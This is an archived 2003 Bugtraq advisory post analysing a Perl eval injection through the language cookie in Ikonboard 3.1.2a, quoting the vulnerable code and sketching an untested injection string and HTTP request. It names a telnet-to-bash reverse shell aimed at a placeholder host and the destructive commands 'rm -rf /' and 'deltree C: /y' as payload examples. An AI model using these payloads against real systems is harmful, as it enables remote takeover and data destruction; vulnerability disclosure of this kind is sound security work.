Attemps with Ikonboard 3.1.2a

From: Shan Whitman (xzziroz_at_rootshell.be)
Date: 09/10/03

  • Next message: Steven M. Christey: "Re: XSS vulnerability in phpBB (an other ;-)"
    Date: Wed, 10 Sep 2003 01:44:29 +0200
    To: mike@unixhideout.com;, bugtraq@securityfocus.com
    
    

    Vender: Jarvis Entertainment
    Product: Ikonboard
    Version: 3.1.2a and Below (All current versions).

    On the topic of the recent post about Ikonboard and it's command execution vulnerabilities

    In FUNC.pm:

    # Make sure the cookie data is legal

            if ($iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'}) {

                $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'} =~ s/^([\d\w]+)$/$1/;

            }

            $default = $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'}

                            || $iB::INFO->{'DEFAULT_LANGUAGE'}

                            || 'en';

            # Quick check to make sure the directory exists

            unless (-d $iB::INFO->{IKON_DIR}."Languages/$default") {

                    $default = 'en';

            }

            my $code = 'require '. "\"$default/" .$area. '.pm"; $lang ='. $area. '->new();';

            eval $code;

            $obj->cgi_error("Could not access the language file: $@") if $@;

            return $lang;

    }

    --------------

    The first bit is of course where the exploit actualy accures. Although we can in definitely define $default to our own value I scratched my head for a while trying to figure out how this could be exploited.

    After a few hours of staring i came to the final (and easy) conclusion that is this:

    If $default where to equal: where 'en' is the usualy default string contained in $default and UniversalWords is contained in $area and then the .pm etc.
    $default = "en/UniversalWords.pm\"; <My code> ; ##"

    then the eval would simply interpret to the following:

    eval require "en/UniversalWords.pm"; <My Code>; ##/" .$area. '.pm"; $lang = '. $area. '->new().

    so what would happen is the eval would do the require on en/UniversalWords.pm then it would move on to execute whatever arbitrary perl code you placed in <My Code>. Such as a
    " `telnet bla.bla.bla.bla | /bin/bash | telnet bla.bla.bla.bla` " or worse (hopefully) an deltree C: /y or rm -rf /, seeing as Ikonboard can be ran on linux or windows.

    The meathod of injecting the code we wish into $default would be as simple as it is in the exploit for 3.1.1:

    GET $PATH HTTP/1.1
    Host: $HOST
    Cookie: lang=%HEX$HEX%HEX%00 ## Followed by a Null Byte to bypass filters.
    Connection: close

    -------

    As of this moment I have not written a working exploit and am not even 100% sure if this would work, seeing as the person who posted this vulnerability a day ago claimed he had a working example I decided to wait on this to see how it is done.

    --K-sPecial


  • Next message: Steven M. Christey: "Re: XSS vulnerability in phpBB (an other ;-)"